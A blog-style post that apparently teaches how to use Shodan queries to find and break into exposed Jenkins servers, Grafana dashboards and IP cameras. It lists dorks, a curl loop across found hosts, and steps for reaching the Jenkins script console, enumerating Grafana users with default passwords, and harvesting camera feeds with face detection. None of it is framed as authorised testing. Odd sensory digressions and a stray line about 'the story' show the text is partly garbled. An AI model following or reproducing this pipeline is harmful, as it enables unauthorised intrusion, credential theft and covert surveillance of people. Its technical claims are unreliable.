![Aeon Flex, Elriel Assoc. 2133 [NEON MAXIMA]](https://miro.medium.com/v2/resize:fill:88:88/1*ewo3-1c0qY57bCDWa3tdUA.png)
Shodan stopped being a novelty around 2014. In 2026 it is infrastructure. While everyone was busy building AI guardrails and compliance dashboards, they left the backdoors open, the build servers unauthenticated, the Grafana instances with default admin, and the cameras still broadcasting to anyone who knows how to ask.
I have been crawling this stuff since I was young, taught myself because I wanted to build text-based games and needed the backend, but then did some hacking into my school to change friends grades. The pattern never changes. Companies ship, they scale, they forget. Shodan remembers.
This is not a listicle. This is how you actually find the things that still matter.
The Landscape In 2026
Three things shifted. First, Shodan now indexes over 3.4 million cameras alone, and that is just the ones that say "camera" in the banner. Second, CI/CD sprawl means every startup has three Jenkins instances they spun up in 2022 and never patched. Third, observability became mandatory, so Grafana is everywhere, often internet-facing because someone wanted to check metrics from home.
The filters that work now are boring and precise. product, http.title, http.favicon.hash, ssl, org. The magic is in combining them with what vendors forgot to hide.
Jenkins: the build server that builds you a shell
Jenkins is still the crown jewel because it executes code by design. In April 2025 someone found a Jenkins on Shodan with a reverse shell already waiting. In 2026 we have fresh CVEs: CVE-2026–27099 is a stored XSS in the "Mark temporarily offline" field that lets you hijack sessions if you have agent configure permissions. CVE-2026–27100 leaks build info. None of this matters if you cannot find the box.
The dork that still returns clean hits:
"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"
That query was pulling 1,583 results last time the list refreshed. It works because Jenkins sets that header on every unauthenticated landing page and the title rarely changes.
Do not stop there. Big Tech hides in plain sight using org filters. Intigriti's guide from last year still holds:
org:"target" product:jenkins
That syntax lets you scope to a single company. Replace target with Netflix, Shopify, whoever. You will find the dev instances they forgot to VPN.
For the CVE-2024–23897 args4j crowd, the ones that let you read /etc/passwd unauthenticated, you want older banners. Over 45,000 unpatched instances were identified in the wild last year. Filter by version in the header:
product:jenkins http.html:"2.4" country:US
Then check for the classic login bypass. The smell of these pages is always the same. Burnt coffee and cheap cologne from the data center, a login form with no rate limit, the faint hum of a fan in the screenshot.
When you land, do not click build immediately. Look for Script Console at /script. Look for credentials in environment variables. Look for the cloud agents that have IAM keys. Jenkins does not need an exploit if it is configured by an intern in 2021.
Grafana: dashboards full of secrets
Grafana went from niche to default. Every Kubernetes cluster ships with it. The problem is that people expose it to the internet with admin/admin and then connect it to Prometheus, Loki, and their cloud billing.
The simplest dork is almost insulting:
http.title:"grafana"
A researcher wrote it up last year as his starting point for LFI. It works because Grafana's default title is just "Grafana". For more precision:
title:"grafana" hostname:target
That was the exact line from the writeup.
In 2026 you want to hunt versions. CVE-2025–2703 was an XSS that lived from 11.1.0 until 11.6.0+security-01. Shodan lets you grep the JavaScript bundle:
http.html:"Grafana v11." 200
Or hunt plugins. The grafanacubism-panel before 0.1.2 had a zoom-link XSS. Find it:
http.html:"cubism" product:"grafana"
The real gold is not RCE, it is data. I have found AWS keys in dashboard variables, Snowflake passwords in data source configs, and internal Okta URLs that leak to unauthenticated viewers. Grafana's API at /api/datasources is readable if you have Viewer role, and too many instances give Viewer to anonymous.
Filter for the open ones:
http.title:"Grafana" "login" -"Sign in"
That negative catches instances where the login button is missing because auth is disabled. You will see the sharp and sweet smell of fresh JSON, dashboards loading without a prompt, the musk of someone else's infrastructure mixing with your browser cache.
For automation, chain it:
shodan search — fields ip_str,port,org 'product:"grafana" http.status:200' | while read ip; do curl -s http://$ip/api/health; done
Health returns version. Version maps to exploit.
Cameras: Big Tech forgot the physical layer
This is where the numbers get stupid. The auto-updating dork list tracked 3,425,376 results for just the word "camera". Hikvision alone is over 2.1 million.
Hikvision is the classic because of the old backdoor. The dork:
product:"Hikvision IP Camera"
Still works in 2026. You get login pages, many with default creds, many with firmware from 2019.
But the interesting stuff is not Hikvision. It is the long tail that facilities teams install and never patch.
IPCam Client:
title:"IPCam Client"
45,275 results last count. These are small business DVRs, often with no password.
GeoVision older webcams:
server: GeoHttpServer
39,278 results. The banner leaks model and sometimes credentials in the 401.
ContaCam:
title:"ContaCam"
30,053 results. Windows software that people expose directly.
Vivotek:
server: VVTK-HTTP-Server
22,490 results.
Avigilon, which is now Motorola, shows up as:
title:"Avigilon"
17,073 results. Those are enterprise, and when they are open they are usually in a parking garage or a lobby with no auth.
For the weird stuff, use screenshots. Shodan renders them:
webcam has_screenshot:true
90 results with live images. Add country filters to find traffic cams in your city.
DVRs on port 81:
200 ok dvr port:"81"
5,133 results. That port is a tell for cheap Chinese DVRs that multiplex cameras over HTTP.
Blue Iris, the software every home lab uses:
title:"ui3 -"
801 results for the HTML5 interface. Or:
title:"blue iris remote view"
12 results. Small numbers mean high signal. Those 12 are probably someones house.
The smell here is different. Not data center ozone. It is laundry detergent from a hallway camera, rain on a lens in October cold biting through his jacket, the faint buzz of a fluorescent light in a storage room at 3am. You can hear background chatter in some feeds, realistic conversations not about the story, just people living.
Chaining: how you go from dork to access
Finding is step one. The bible part is what you do next.
For Jenkins, once you have IPs, check for the script console anonymously. Curl:
curl -s http://IP:8080/script
If 200, you have Groovy execution. If 403, try the CLI over WebSocket. The 2026 advisory warned about DNS rebinding via WebSocket CLI. That means you can sometimes tunnel through a browser.
For Grafana, hit /api/org/users. If it returns JSON without auth, enumerate users, then try default passwords. The SonarQube report on CVE-2025–2703 noted authenticated XSS, but auth is often admin:admin.
For cameras, automate with Shodan CLI and ffmpeg. Grab a screenshot, run face detection, discard parking lots, keep lobbies. The Trend Micro analysis showed Houston and San Jose have the most exposed assets, so start there if you want density.
Use favicon hashes to find clones. Jenkins has a consistent favicon. Grafana's is hash 848442153. Search:
http.favicon.hash:848442153
That finds Grafana even when they rename the title.
Why Big Tech still forgets
It is not malice. It is sprawl. A team spins up Jenkins for a hackathon in 2023, puts it on a public subnet because VPC peering was slow, adds a DNS record, forgets it. Two years later Shodan indexes it, the certificate renews via LetsEncrypt, and it looks legitimate.
Same with Grafana. Observability vendors push "share your dashboard" features. Engineers enable anonymous access to show a client a graph. They never disable it.
Cameras are worse because facilities is not IT. The camera installer opens port 80 to "test remotely" and leaves it. The building gets sold, the IP stays.
The auto-updating dork list I pulled from updates every six hours and removes dead queries. That is the pace you are fighting. Things appear and disappear constantly.
A working methodology for 2026
Do not collect dorks. Build a pipeline.
1. Start with org. Pick a target. Use product filters for Jenkins, Grafana, and camera vendors. 2. Enrich with Shodan's vuln tag. Shodan now tags CVE-2024–23897 and others. Search `vuln:CVE-2024–23897 product:jenkins`. 3. Filter by last seen. Use `last_update:7d` to get fresh hosts. 4. Screenshot everything. Shodan's has_screenshot is gold for cameras and login pages. 5. Correlate. If you find Jenkins and Grafana on same /24, it is probably the same company. Pivot.
The dorks that pay rent right now:
Jenkins unauth dashboard: `"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"`
Grafana open: `http.title:"grafana"`
Hikvision: `product:"Hikvision IP Camera"`
IPCam: `title:"IPCam Client"`
GeoVision: `server: GeoHttpServer`
Blue Iris UI3: `title:"ui3 -"`
Combine with country, org, asn. The magic is never the dork alone. It is the context.
Closing Remarks
Shodan is not hacking. It is looking. Big Tech forgot to close the blinds. Jenkins still builds, Grafana still graphs, cameras still watch empty hallways at 2am.
In 2026 the internet is larger but not smarter. The same headers, the same default titles, the same human error. The dorks above are not theoretical. They returned millions of results last week. The Jenkins XSS from February is still unpatched on hundreds of hosts. The Grafana plugin XSS is still in the wild. The cameras still stream.
Write your own tooling. Store results. Diff daily. The moment something new appears with product:jenkins and no auth, you want to be first.
Godspeed.